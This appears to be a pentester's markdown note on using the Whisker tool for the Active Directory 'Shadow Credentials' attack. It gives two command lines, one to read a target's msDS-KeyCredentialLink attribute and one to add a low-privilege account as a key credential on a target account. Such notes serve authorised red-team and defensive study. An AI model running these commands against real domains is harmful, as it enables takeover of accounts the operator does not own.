# whisker.exe
This [tool](https://github.com/eladshamir/Whisker) is "for taking over Active Directory user and computer accounts by manipulating their msDS-KeyCredentialLink attribute, effectively adding "Shadow Credentials" to the target account." 

[This video](https://www.youtube.com/watch?v=IK7qPMqSKMY) is a great reference for seeing the Shadow Credentials attack carried out with assistance from Whisker.

## Read the *msDS-KeyCredentialLink* attribute
```
whisker.exe list /target:SOME-MACHINE$
```

## Add your lowpriv account as the Shadow Credential
Spawn a "runas" cmd.exe as the *LOWPRIV* account, and then:

```
whisker.exe add /target:MSOL-SYNC-ACCOUNT /domain:domain.com /dc:1.2.3.4
```
